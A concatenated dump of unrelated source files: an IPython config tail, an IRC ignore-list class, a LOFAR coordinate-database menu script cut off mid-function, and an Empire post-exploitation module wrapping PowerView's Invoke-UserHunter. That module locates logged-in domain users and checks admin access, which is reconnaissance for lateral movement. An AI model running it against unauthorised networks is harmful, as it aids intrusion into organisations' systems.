# c.InteractiveShell.banner1 = "Python 3.8.6 (default, Sep 25 2020, 09:36:53) \nType 'copyright', 'credits' or 'license' for more information\nIPython 7.18.1 -- An enhanced Interactive Python. Type '?' for help.\n"
## The part of the banner to be printed after the profile
# Default: ''
# c.InteractiveShell.banner2 = ''
## Set the size of the output cache. The default is 1000, you can change it
# permanently in your config file. Setting it to 0 completely disables the
# caching system, and the minimum value accepted is 3 (if you provide a value
# less than 3, it is reset to 0 and a warning is issued). This limit is defined
# because otherwise you'll spend more time re-flushing a too small cache than
# working
# Default: 1000
# c.InteractiveShell.cache_size = 1000
## Use colors for displaying information about objects. Because this information
# is passed through a pager (like 'less'), and some pagers get confused with
# color codes, this capability can be turned off.
# Default: True
# c.InteractiveShell.color_info = True
## Set the color scheme (NoColor, Neutral, Linux, or LightBG).
# Choices: any of ['Neutral', 'NoColor', 'LightBG', 'Linux'] (case-insensitive)
# Default: 'Neutral'
# c.InteractiveShell.colors = 'Neutral'
# Default: False
# c.InteractiveShell.debug = False
## Don't call post-execute functions that have failed in the past.
# Default: False
# c.InteractiveShell.disable_failing_post_execute = False
## If True, anything that would be passed to the pager will be displayed as
# regular output instead.
# Default: False
# c.InteractiveShell.display_page = False
## (Provisional API) enables html representation in mime bundles sent to pagers.
# Default: False
# c.InteractiveShell.enable_html_pager = False
## Total length of command history
# Default: 10000
# c.InteractiveShell.history_length = 10000
## The number of saved history entries to be loaded into the history buffer at
# startup.
# Default: 1000
# c.InteractiveShell.history_load_length = 1000
# Default: ''
# c.InteractiveShell.ipython_dir = ''
## Start logging to the given file in append mode. Use `logfile` to specify a log
# file to **overwrite** logs to.
# Default: ''
# c.InteractiveShell.logappend = ''
## The name of the logfile to use.
# Default: ''
# c.InteractiveShell.logfile = ''
## Start logging to the default log file in overwrite mode. Use `logappend` to
# specify a log file to **append** logs to.
# Default: False
# c.InteractiveShell.logstart = False
## Select the loop runner that will be used to execute top-level asynchronous
# code
# Default: 'IPython.core.interactiveshell._asyncio_runner'
# c.InteractiveShell.loop_runner = 'IPython.core.interactiveshell._asyncio_runner'
# Choices: any of [0, 1, 2]
# Default: 0
# c.InteractiveShell.object_info_string_level = 0
## Automatically call the pdb debugger after every exception.
# Default: False
# c.InteractiveShell.pdb = False
## Deprecated since IPython 4.0 and ignored since 5.0, set
# TerminalInteractiveShell.prompts object directly.
# Default: 'In [\\#]: '
# c.InteractiveShell.prompt_in1 = 'In [\\#]: '
## Deprecated since IPython 4.0 and ignored since 5.0, set
# TerminalInteractiveShell.prompts object directly.
# Default: ' .\\D.: '
# c.InteractiveShell.prompt_in2 = ' .\\D.: '
## Deprecated since IPython 4.0 and ignored since 5.0, set
# TerminalInteractiveShell.prompts object directly.
# Default: 'Out[\\#]: '
# c.InteractiveShell.prompt_out = 'Out[\\#]: '
## Deprecated since IPython 4.0 and ignored since 5.0, set
# TerminalInteractiveShell.prompts object directly.
# Default: True
# c.InteractiveShell.prompts_pad_left = True
# Default: False
# c.InteractiveShell.quiet = False
# Default: '\n'
# c.InteractiveShell.separate_in = '\n'
# Default: ''
# c.InteractiveShell.separate_out = ''
# Default: ''
# c.InteractiveShell.separate_out2 = ''
## Show rewritten input, e.g. for autocall.
# Default: True
# c.InteractiveShell.show_rewritten_input = True
## Enables rich html representation of docstrings. (This requires the docrepr
# module).
# Default: False
# c.InteractiveShell.sphinxify_docstring = False
# Default: True
# c.InteractiveShell.wildcards_case_sensitive = True
## Switch modes for the IPython exception handlers.
# Choices: any of ['Context', 'Plain', 'Verbose', 'Minimal'] (case-insensitive)
# Default: 'Context'
# c.InteractiveShell.xmode = 'Context'
# ------------------------------------------------------------------------------
# TerminalInteractiveShell(InteractiveShell) configuration
# ------------------------------------------------------------------------------
##
# See also: InteractiveShell.ast_node_interactivity
# c.TerminalInteractiveShell.ast_node_interactivity = 'last_expr'
##
# See also: InteractiveShell.ast_transformers
# c.TerminalInteractiveShell.ast_transformers = []
##
# See also: InteractiveShell.autoawait
# c.TerminalInteractiveShell.autoawait = True
##
# See also: InteractiveShell.autocall
# c.TerminalInteractiveShell.autocall = 0
## Autoformatter to reformat Terminal code. Can be `'black'` or `None`
# Default: None
# c.TerminalInteractiveShell.autoformatter = None
##
# See also: InteractiveShell.autoindent
# c.TerminalInteractiveShell.autoindent = True
##
# See also: InteractiveShell.automagic
# c.TerminalInteractiveShell.automagic = True
## The part of the banner to be printed before the profile
# See also: InteractiveShell.banner1
# c.TerminalInteractiveShell.banner1 = "Python 3.8.6 (default, Sep 25 2020, 09:36:53) \nType 'copyright', 'credits' or 'license' for more information\nIPython 7.18.1 -- An enhanced Interactive Python. Type '?' for help.\n"
## The part of the banner to be printed after the profile
# See also: InteractiveShell.banner2
# c.TerminalInteractiveShell.banner2 = ''
##
# See also: InteractiveShell.cache_size
# c.TerminalInteractiveShell.cache_size = 1000
##
# See also: InteractiveShell.color_info
# c.TerminalInteractiveShell.color_info = True
## Set the color scheme (NoColor, Neutral, Linux, or LightBG).
# See also: InteractiveShell.colors
# c.TerminalInteractiveShell.colors = 'Neutral'
## Set to confirm when you try to exit IPython with an EOF (Control-D in Unix,
# Control-Z/Enter in Windows). By typing 'exit' or 'quit', you can force a
# direct exit without any confirmation.
# Default: True
# c.TerminalInteractiveShell.confirm_exit = True
# See also: InteractiveShell.debug
# c.TerminalInteractiveShell.debug = False
## Don't call post-execute functions that have failed in the past.
# See also: InteractiveShell.disable_failing_post_execute
# c.TerminalInteractiveShell.disable_failing_post_execute = False
## Options for displaying tab completions, 'column', 'multicolumn', and
# 'readlinelike'. These options are for `prompt_toolkit`, see `prompt_toolkit`
# documentation for more information.
# Choices: any of ['column', 'multicolumn', 'readlinelike']
# Default: 'multicolumn'
# c.TerminalInteractiveShell.display_completions = 'multicolumn'
## If True, anything that would be passed to the pager
# See also: InteractiveShell.display_page
# c.TerminalInteractiveShell.display_page = False
## Shortcut style to use at the prompt. 'vi' or 'emacs'.
# Default: 'emacs'
# c.TerminalInteractiveShell.editing_mode = 'emacs'
## Set the editor used by IPython (default to $EDITOR/vi/notepad).
# Default: 'vim'
# c.TerminalInteractiveShell.editor = 'vim'
## Allows to enable/disable the prompt toolkit history search
# Default: True
# c.TerminalInteractiveShell.enable_history_search = True
##
# See also: InteractiveShell.enable_html_pager
# c.TerminalInteractiveShell.enable_html_pager = False
## Enable vi (v) or Emacs (C-X C-E) shortcuts to open an external editor. This is
# in addition to the F2 binding, which is always enabled.
# Default: False
# c.TerminalInteractiveShell.extra_open_editor_shortcuts = False
## Provide an alternative handler to be called when the user presses Return. This
# is an advanced option intended for debugging, which may be changed or removed
# in later releases.
# Default: None
# c.TerminalInteractiveShell.handle_return = None
## Highlight matching brackets.
# Default: True
# c.TerminalInteractiveShell.highlight_matching_brackets = True
## The name or class of a Pygments style to use for syntax highlighting. To see
# available styles, run `pygmentize -L styles`.
# Default: traitlets.Undefined
# c.TerminalInteractiveShell.highlighting_style = traitlets.Undefined
## Override highlighting format for specific tokens
# Default: {}
# c.TerminalInteractiveShell.highlighting_style_overrides = {}
## Total length of command history
# See also: InteractiveShell.history_length
# c.TerminalInteractiveShell.history_length = 10000
##
# See also: InteractiveShell.history_load_length
# c.TerminalInteractiveShell.history_load_length = 1000
# See also: InteractiveShell.ipython_dir
# c.TerminalInteractiveShell.ipython_dir = ''
##
# See also: InteractiveShell.logappend
# c.TerminalInteractiveShell.logappend = ''
##
# See also: InteractiveShell.logfile
# c.TerminalInteractiveShell.logfile = ''
##
# See also: InteractiveShell.logstart
# c.TerminalInteractiveShell.logstart = False
## Select the loop runner that will be used to execute top-level asynchronous
# code
# See also: InteractiveShell.loop_runner
# c.TerminalInteractiveShell.loop_runner = 'IPython.core.interactiveshell._asyncio_runner'
# Default: {}
# c.TerminalInteractiveShell.mime_renderers = {}
## Enable mouse support in the prompt (Note: prevents selecting text with the
# mouse)
# Default: False
# c.TerminalInteractiveShell.mouse_support = False
# See also: InteractiveShell.object_info_string_level
# c.TerminalInteractiveShell.object_info_string_level = 0
##
# See also: InteractiveShell.pdb
# c.TerminalInteractiveShell.pdb = False
## Deprecated since IPython 4.0 and ignored since 5.0, set
# TerminalInteractiveShell.prompts object directly.
# See also: InteractiveShell.prompt_in1
# c.TerminalInteractiveShell.prompt_in1 = 'In [\\#]: '
## Deprecated since IPython 4.0 and ignored since 5.0, set
# TerminalInteractiveShell.prompts object directly.
# See also: InteractiveShell.prompt_in2
# c.TerminalInteractiveShell.prompt_in2 = ' .\\D.: '
## Display the current vi mode (when using vi editing mode).
# Default: True
# c.TerminalInteractiveShell.prompt_includes_vi_mode = True
## Deprecated since IPython 4.0 and ignored since 5.0, set
# TerminalInteractiveShell.prompts object directly.
# See also: InteractiveShell.prompt_out
# c.TerminalInteractiveShell.prompt_out = 'Out[\\#]: '
## Class used to generate Prompt token for prompt_toolkit
# Default: 'IPython.terminal.prompts.Prompts'
# c.TerminalInteractiveShell.prompts_class = 'IPython.terminal.prompts.Prompts'
## Deprecated since IPython 4.0 and ignored since 5.0, set
# TerminalInteractiveShell.prompts object directly.
# See also: InteractiveShell.prompts_pad_left
# c.TerminalInteractiveShell.prompts_pad_left = True
# See also: InteractiveShell.quiet
# c.TerminalInteractiveShell.quiet = False
# See also: InteractiveShell.separate_in
# c.TerminalInteractiveShell.separate_in = '\n'
# See also: InteractiveShell.separate_out
# c.TerminalInteractiveShell.separate_out = ''
# See also: InteractiveShell.separate_out2
# c.TerminalInteractiveShell.separate_out2 = ''
## Show rewritten input, e.g. for autocall.
# See also: InteractiveShell.show_rewritten_input
# c.TerminalInteractiveShell.show_rewritten_input = True
## Use `raw_input` for the REPL, without completion and prompt colors.
#
# Useful when controlling IPython as a subprocess, and piping STDIN/OUT/ERR.
# Known usage are: IPython own testing machinery, and emacs inferior-shell
# integration through elpy.
#
# This mode default to `True` if the `IPY_TEST_SIMPLE_PROMPT` environment
# variable is set, or the current terminal is not a tty.
# Default: False
# c.TerminalInteractiveShell.simple_prompt = False
## Number of line at the bottom of the screen to reserve for the tab completion
# menu, search history, ...etc, the height of these menus will at most this
# value. Increase it is you prefer long and skinny menus, decrease for short and
# wide.
# Default: 6
# c.TerminalInteractiveShell.space_for_menu = 6
##
# See also: InteractiveShell.sphinxify_docstring
# c.TerminalInteractiveShell.sphinxify_docstring = False
## Automatically set the terminal title
# Default: True
# c.TerminalInteractiveShell.term_title = True
## Customize the terminal title format. This is a python format string.
# Available substitutions are: {cwd}.
# Default: 'IPython: {cwd}'
# c.TerminalInteractiveShell.term_title_format = 'IPython: {cwd}'
## Use 24bit colors instead of 256 colors in prompt highlighting. If your
# terminal supports true color, the following command should print 'TRUECOLOR'
# in orange: printf "\x1b[38;2;255;100;0mTRUECOLOR\x1b[0m\n"
# Default: False
# c.TerminalInteractiveShell.true_color = False
# See also: InteractiveShell.wildcards_case_sensitive
# c.TerminalInteractiveShell.wildcards_case_sensitive = True
## Switch modes for the IPython exception handlers.
# See also: InteractiveShell.xmode
# c.TerminalInteractiveShell.xmode = 'Context'
# ------------------------------------------------------------------------------
# HistoryAccessor(HistoryAccessorBase) configuration
# ------------------------------------------------------------------------------
## Access the history database without adding to it.
#
# This is intended for use by standalone history tools. IPython shells use
# HistoryManager, below, which is a subclass of this.
## Options for configuring the SQLite connection
#
# These options are passed as keyword args to sqlite3.connect when establishing
# database connections.
# Default: {}
# c.HistoryAccessor.connection_options = {}
## enable the SQLite history
#
# set enabled=False to disable the SQLite history, in which case there will be
# no stored history, no SQLite connection, and no background saving thread.
# This may be necessary in some threaded environments where IPython is embedded.
# Default: True
# c.HistoryAccessor.enabled = True
## Path to file to use for SQLite history database.
#
# By default, IPython will put the history database in the IPython profile
# directory. If you would rather share one history among profiles, you can set
# this value in each, so that they are consistent.
#
# Due to an issue with fcntl, SQLite is known to misbehave on some NFS mounts.
# If you see IPython hanging, try setting this to something on a local disk,
# e.g::
#
# ipython --HistoryManager.hist_file=/tmp/ipython_hist.sqlite
#
# you can also use the specific value `:memory:` (including the colon at both
# end but not the back ticks), to avoid creating an history file.
# Default: ''
# c.HistoryAccessor.hist_file = ''
# ------------------------------------------------------------------------------
# HistoryManager(HistoryAccessor) configuration
# ------------------------------------------------------------------------------
## A class to organize all history-related functionality in one place.
## Options for configuring the SQLite connection
# See also: HistoryAccessor.connection_options
# c.HistoryManager.connection_options = {}
## Write to database every x commands (higher values save disk access & power).
# Values of 1 or less effectively disable caching.
# Default: 0
# c.HistoryManager.db_cache_size = 0
## Should the history database include output? (default: no)
# Default: False
# c.HistoryManager.db_log_output = False
## enable the SQLite history
# See also: HistoryAccessor.enabled
# c.HistoryManager.enabled = True
## Path to file to use for SQLite history database.
# See also: HistoryAccessor.hist_file
# c.HistoryManager.hist_file = ''
# ------------------------------------------------------------------------------
# ProfileDir(LoggingConfigurable) configuration
# ------------------------------------------------------------------------------
## An object to manage the profile directory and its resources.
#
# The profile directory is used by all IPython applications, to manage
# configuration, logging and security.
#
# This object knows how to find, create and manage these directories. This
# should be used by any code that wants to handle profiles.
## Set the profile location directly. This overrides the logic used by the
# `profile` option.
# Default: ''
# c.ProfileDir.location = ''
# ------------------------------------------------------------------------------
# BaseFormatter(Configurable) configuration
# ------------------------------------------------------------------------------
## A base formatter class that is configurable.
#
# This formatter should usually be used as the base class of all formatters. It
# is a traited :class:`Configurable` class and includes an extensible API for
# users to determine how their objects are formatted. The following logic is
# used to find a function to format an given object.
#
# 1. The object is introspected to see if it has a method with the name
# :attr:`print_method`. If is does, that object is passed to that method
# for formatting.
# 2. If no print method is found, three internal dictionaries are consulted
# to find print method: :attr:`singleton_printers`, :attr:`type_printers`
# and :attr:`deferred_printers`.
#
# Users should use these dictionaries to register functions that will be used to
# compute the format data for their objects (if those objects don't have the
# special print methods). The easiest way of using these dictionaries is through
# the :meth:`for_type` and :meth:`for_type_by_name` methods.
#
# If no function/callable is found to compute the format data, ``None`` is
# returned and this format type is not used.
# Default: {}
# c.BaseFormatter.deferred_printers = {}
# Default: True
# c.BaseFormatter.enabled = True
# Default: {}
# c.BaseFormatter.singleton_printers = {}
# Default: {}
# c.BaseFormatter.type_printers = {}
# ------------------------------------------------------------------------------
# PlainTextFormatter(BaseFormatter) configuration
# ------------------------------------------------------------------------------
## The default pretty-printer.
#
# This uses :mod:`IPython.lib.pretty` to compute the format data of the object.
# If the object cannot be pretty printed, :func:`repr` is used. See the
# documentation of :mod:`IPython.lib.pretty` for details on how to write pretty
# printers. Here is a simple example::
#
# def dtype_pprinter(obj, p, cycle):
# if cycle:
# return p.text('dtype(...)')
# if hasattr(obj, 'fields'):
# if obj.fields is None:
# p.text(repr(obj))
# else:
# p.begin_group(7, 'dtype([')
# for i, field in enumerate(obj.descr):
# if i > 0:
# p.text(',')
# p.breakable()
# p.pretty(field)
# p.end_group(7, '])')
# See also: BaseFormatter.deferred_printers
# c.PlainTextFormatter.deferred_printers = {}
# Default: ''
# c.PlainTextFormatter.float_precision = ''
## Truncate large collections (lists, dicts, tuples, sets) to this size.
#
# Set to 0 to disable truncation.
# Default: 1000
# c.PlainTextFormatter.max_seq_length = 1000
# Default: 79
# c.PlainTextFormatter.max_width = 79
# Default: '\n'
# c.PlainTextFormatter.newline = '\n'
# Default: True
# c.PlainTextFormatter.pprint = True
# See also: BaseFormatter.singleton_printers
# c.PlainTextFormatter.singleton_printers = {}
# See also: BaseFormatter.type_printers
# c.PlainTextFormatter.type_printers = {}
# Default: False
# c.PlainTextFormatter.verbose = False
# ------------------------------------------------------------------------------
# Completer(Configurable) configuration
# ------------------------------------------------------------------------------
## Enable unicode completions, e.g. \alpha<tab> . Includes completion of latex
# commands, unicode names, and expanding unicode characters back to latex
# commands.
# Default: True
# c.Completer.backslash_combining_completions = True
## Enable debug for the Completer. Mostly print extra information for
# experimental jedi integration.
# Default: False
# c.Completer.debug = False
## Activate greedy completion PENDING DEPRECTION. this is now mostly taken care
# of with Jedi.
#
# This will enable completion on elements of lists, results of function calls,
# etc., but can be unsafe because the code is actually evaluated on TAB.
# Default: False
# c.Completer.greedy = False
## Experimental: restrict time (in milliseconds) during which Jedi can compute
# types. Set to 0 to stop computing types. Non-zero value lower than 100ms may
# hurt performance by preventing jedi to build its cache.
# Default: 400
# c.Completer.jedi_compute_type_timeout = 400
## Experimental: Use Jedi to generate autocompletions. Default to True if jedi is
# installed.
# Default: True
# c.Completer.use_jedi = True
# ------------------------------------------------------------------------------
# IPCompleter(Completer) configuration
# ------------------------------------------------------------------------------
## Extension of the completer class with IPython-specific features
## Enable unicode completions, e.g. \alpha<tab> . Includes completion of latex
# commands, unicode names, and expanding unicode characters back to latex
# commands.
# See also: Completer.backslash_combining_completions
# c.IPCompleter.backslash_combining_completions = True
## Enable debug for the Completer. Mostly print extra information for
# experimental jedi integration.
# See also: Completer.debug
# c.IPCompleter.debug = False
## Activate greedy completion
# See also: Completer.greedy
# c.IPCompleter.greedy = False
## Experimental: restrict time (in milliseconds) during which Jedi can compute
# types.
# See also: Completer.jedi_compute_type_timeout
# c.IPCompleter.jedi_compute_type_timeout = 400
## DEPRECATED as of version 5.0.
#
# Instruct the completer to use __all__ for the completion
#
# Specifically, when completing on ``object.<tab>``.
#
# When True: only those names in obj.__all__ will be included.
#
# When False [default]: the __all__ attribute is ignored
# Default: False
# c.IPCompleter.limit_to__all__ = False
## Whether to merge completion results into a single list
#
# If False, only the completion results from the first non-empty completer will
# be returned.
# Default: True
# c.IPCompleter.merge_completions = True
## Instruct the completer to omit private method names
#
# Specifically, when completing on ``object.<tab>``.
#
# When 2 [default]: all names that start with '_' will be excluded.
#
# When 1: all 'magic' names (``__foo__``) will be excluded.
#
# When 0: nothing will be excluded.
# Choices: any of [0, 1, 2]
# Default: 2
# c.IPCompleter.omit__names = 2
## Experimental: Use Jedi to generate autocompletions. Default to True if jedi is
# installed.
# See also: Completer.use_jedi
# c.IPCompleter.use_jedi = True
# ------------------------------------------------------------------------------
# ScriptMagics(Magics) configuration
# ------------------------------------------------------------------------------
## Magics for talking to scripts
#
# This defines a base `%%script` cell magic for running a cell with a program in
# a subprocess, and registers a few top-level magics that call %%script with
# common interpreters.
## Extra script cell magics to define
#
# This generates simple wrappers of `%%script foo` as `%%foo`.
#
# If you want to add script magics that aren't on your path, specify them in
# script_paths
# Default: []
# c.ScriptMagics.script_magics = []
## Dict mapping short 'ruby' names to full paths, such as '/opt/secret/bin/ruby'
#
# Only necessary for items in script_magics where the default path will not find
# the right interpreter.
# Default: {}
# c.ScriptMagics.script_paths = {}
# ------------------------------------------------------------------------------
# LoggingMagics(Magics) configuration
# ------------------------------------------------------------------------------
## Magics related to all logging machinery.
## Suppress output of log state when logging is enabled
# Default: False
# c.LoggingMagics.quiet = False
# ------------------------------------------------------------------------------
# StoreMagics(Magics) configuration
# ------------------------------------------------------------------------------
## Lightweight persistence for python variables.
#
# Provides the %store magic.
## If True, any %store-d variables will be automatically restored when IPython
# starts.
# Default: False
# c.StoreMagics.autorestore = False
| unlicense | -8,919,215,008,065,537,000 | 36.139289 | 222 | 0.687316 | false |
Zarthus/Reconcile | tools/ignorelist.py | 1 | 2663 | """
The MIT License (MIT)
Copyright (c) 2014 - 2015 Jos "Zarthus" Ahrens and contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import re
class IgnoreList:
def __init__(self, ignorelist):
if ignorelist:
self.ignorelist = ignorelist
else:
self.ignorelist = []
def isIgnored(self, target):
if target.lower() in self.ignorelist:
return True
for user in self.ignorelist:
if "*" in user:
userRegex = self.compileIgnore(user)
if userRegex.match(target):
return True
return False
def isIgnoredWildcard(self, wctarget):
if "*" not in wctarget:
return self.isIgnored(wctarget)
target = self.compileIgnore(wctarget)
for user in self.ignorelist:
if target.match(user):
return True
if "*" in user:
userRegex = self.compileIgnore(user)
if userRegex.match(wctarget):
return True
return False
def ignore(self, target):
if target.lower() in self.ignorelist:
return False
self.ignorelist.append(target.lower())
return True
def unignore(self, target):
if target.lower() in self.ignorelist:
self.ignorelist.remove(target.lower())
return True
return False
def getIgnoreList(self):
return self.ignorelist
def compileIgnore(self, target):
return re.compile(re.escape(target)
.replace("\\*", ".*")
.replace("\\?", "."), re.I)
| mit | 5,329,721,178,999,119,000 | 30.702381 | 77 | 0.640631 | false |
pierce403/EmpirePanel | lib/modules/situational_awareness/network/powerview/user_hunter.py | 1 | 5974 | from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-UserHunter',
'Author': ['@harmj0y'],
'Description': ('Finds which machines users of a specified group are logged into. '
'Part of PowerView.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'MinPSVersion' : '2',
'Comments': [
'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'ComputerName' : {
'Description' : 'Hosts to enumerate.',
'Required' : False,
'Value' : ''
},
'ComputerFilter' : {
'Description' : 'Host filter name to query AD for, wildcards accepted.',
'Required' : False,
'Value' : ''
},
'GroupName' : {
'Description' : 'Group name to query for target users.',
'Required' : False,
'Value' : ''
},
'TargetServer' : {
'Description' : 'Hunt for users who are effective local admins on a target server.',
'Required' : False,
'Value' : ''
},
'UserName' : {
'Description' : 'Specific username to search for.',
'Required' : False,
'Value' : ''
},
'UserFilter' : {
'Description' : 'A customized ldap filter string to use for user enumeration, e.g. "(description=*admin*)"',
'Required' : False,
'Value' : ''
},
'StopOnSuccess' : {
'Description' : 'Switch. Stop hunting after finding after finding a target user.',
'Required' : False,
'Value' : ''
},
'NoPing' : {
'Description' : "Don't ping each host to ensure it's up before enumerating.",
'Required' : False,
'Value' : ''
},
'CheckAccess' : {
'Description' : 'Switch. Check if the current user has local admin access to found machines.',
'Required' : False,
'Value' : ''
},
'Delay' : {
'Description' : 'Delay between enumerating hosts, defaults to 0.',
'Required' : False,
'Value' : ''
},
'Domain' : {
'Description' : 'The domain to use for the query, defaults to the current domain.',
'Required' : False,
'Value' : ''
},
'DomainController' : {
'Description' : 'Domain controller to reflect LDAP queries through.',
'Required' : False,
'Value' : ''
},
'ShowAll' : {
'Description' : 'Switch. Return all user location results without filtering.',
'Required' : False,
'Value' : ''
},
'Stealth' : {
'Description' : 'Switch. Only enumerate sessions from connonly used target servers.',
'Required' : False,
'Value' : ''
},
'Threads' : {
'Description' : 'The maximum concurrent threads to execute.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script += moduleName + " "
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
script += ' | fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
return script
| bsd-3-clause | -559,141,152,159,625,900 | 36.572327 | 128 | 0.4307 | false |
kernsuite-debian/lofar | MAC/Deployment/data/Coordinates/CoordMenu.py | 1 | 10615 | #!/usr/bin/env python
# P.Donker ASTRON
# and Arno Schoenmakers the Great
import sys
import pg
from subprocess import Popen
import os
import getpass
from optparse import OptionParser
from database import getDBname, getDBhost, getDBport, getDBuser
VERSION = '0.0.2' # version of this script
default_targetdate='2009.5'
def menu():
print("""
|=====================================|
| Coordinates menu |
|=====================================|
| 0 do all (1,2,3,4,5,6,7,9,11) |
| 1 destroy and create CDB |
| 2 create CDB objects |
| 3 load all normal-vectors |
| 4 load all rotation matrices |
| 5 load all hba_rotations |
| 6 calculate all HBADeltas |
| 7 load all ETRF(expected) files |
| 8 load one measurement file |
| 9 transform all ETRF to ITRF |
| 10 transform one ETRF to ITRF |
| 11 make all conf files |
| 12 make one conf file |
| Q quit |
|_____________________________________|
""")
def get_input_with_default(prompt, default_value):
answer = default_value
try:
input = raw_input # Python2 and Python3 compatible
except NameError:
pass
answer = input(prompt+" ["+str(default_value)+"]: ")
if (len(answer) == 0):
answer = default_value
return answer
def create_cdb():
print('Creating new database')
res = Popen('./create_CDB.sh').wait()
print(res)
def create_cdb_objects():
print('Creating database objects')
res = Popen('./create_CDB_objects.py').wait()
print(res)
def load_normal_vectors():
print('Loading normal vectors')
filename = get_input_with_default("enter filename to load", "data/normal_vectors.dat")
if len(filename) == 0:
print('Error, No filename given')
sys.exit()
if not os.path.exists(filename):
print("File does not exist")
sys.exit()
res = Popen(['./load_normal_vectors.py', filename]).wait()
if (res != 0):
sys.exit(1)
# time.sleep(3)
def load_rotation_matrices():
print('Loading rotation matrices')
filename = get_input_with_default("enter filename to load", "data/rotation_matrices.dat")
if len(filename) == 0:
print('Error, No filename given')
sys.exit()
if not os.path.exists(filename):
print("File does not exist")
sys.exit()
res = Popen(['./load_rotation_matrices.py', filename]).wait()
if (res != 0):
sys.exit(1)
# time.sleep(3)
def load_hba_rotations():
print('Loading hba field rotations')
filename = get_input_with_default("enter filename to load", "data/hba-rotations.csv")
if len(filename) == 0:
print('Error, No filename given')
sys.exit()
if not os.path.exists(filename):
print("File does not exist")
sys.exit()
res = Popen(['./load_hba_rotations.py', filename]).wait()
if (res != 0):
sys.exit(1)
# time.sleep(3)
def calculate_hba_deltas():
print('calculating hba-deltas')
# time.sleep(3)
res = Popen(['./calc_hba_deltas.py']).wait()
if (res != 0):
sys.exit(1)
def load_all_etrf():
print('loading all ETRF files from .//ETRF_FILES')
os.chdir(os.curdir+'/ETRF_FILES')
dirs = sorted(os.listdir(os.curdir))
for dir in dirs:
os.chdir(os.curdir+'/'+dir)
files = os.listdir(os.curdir)
for filename in files:
if not os.path.exists(filename):
print("File ",filename,"does not exist")
sys.exit()
res = Popen(['../../load_expected_pos.py', filename]).wait()
if (res != 0):
sys.exit(1)
os.chdir(os.pardir)
os.chdir(os.pardir)
def load_measurement():
print('load one measurement file')
filename = get_input_with_default("enter filename to load", "")
if len(filename) == 0:
print('Error, No filename given')
sys.exit()
if not os.path.exists(filename):
print("File ",filename,"does not exist")
sys.exit()
res = Popen(['./load_measurementfile.py', filename]).wait()
if (res != 0):
sys.exit(1)
def transform_all(db_host, db_port, db_name, db_user, db_password):
db = pg.connect(user=db_user, host=db_host, dbname=db_name, port=db_port, passwd=db_password)
print('Transform all ETRF coordinates to ITRF coordinates for given date')
target = get_input_with_default("Enter target_date", default_targetdate)
sql = "select distinct o.stationname from object o inner join field_rotations r on r.id = o.id"
all_stations = db.query(sql).getresult()
sql = "select distinct o.stationname from object o inner join reference_coord r on r.id = o.id"
ref_stations = db.query(sql).getresult()
for stationname in ref_stations:
station = stationname[0]
if 0 != Popen(['./calc_coordinates.py', station, "LBA", target]).wait():
sys.exit(1)
if 0 != Popen(['./calc_coordinates.py', station, "CLBA", target]).wait():
sys.exit(1)
# if station[:1] == 'C': # core station
if 0 != Popen(['./calc_coordinates.py', station, "HBA0", target]).wait():
sys.exit(1)
if 0 != Popen(['./calc_coordinates.py', station, "CHBA0", target]).wait():
sys.exit(1)
if 0 != Popen(['./calc_coordinates.py', station, "HBA1", target]).wait():
sys.exit(1)
if 0 != Popen(['./calc_coordinates.py', station, "CHBA1", target]).wait():
sys.exit(1)
# else: #remote or international station
if 0 != Popen(['./calc_coordinates.py', station, "HBA", target]).wait():
sys.exit(1)
if 0 != Popen(['./calc_coordinates.py', station, "CHBA", target]).wait():
sys.exit(1)
db.close()
missing_stations = list(set(all_stations) - set(ref_stations))
for stationname in missing_stations:
station = stationname[0]
print("Station with known HBA rotation but no ETRF: ",station)
def transform_one():
print('Transform ETRF coordinates to ITRF coordinates for given station and date')
station = get_input_with_default("Enter station ", "")
anttype = get_input_with_default("Enter type (LBA|HBA|HBA0|HBA1|CLBA|CHBA0|CHBA1|CHBA)", "")
target = get_input_with_default("Enter target_date ", default_targetdate)
res = Popen(['./calc_coordinates.py', station, anttype, target]).wait()
if (res != 0):
sys.exit(1)
def make_all_conf_files(db_host, db_port, db_name, db_user, db_password):
db = pg.connect(user=db_user, host=db_host, dbname=db_name, port=db_port, passwd=db_password)
print('Make all AntennaField.conf and iHBADeltas.conf files for given date')
target = get_input_with_default("Enter target_date", default_targetdate)
query = """select distinct o.stationname from
object o inner join reference_coord r on r.id = o.id"""
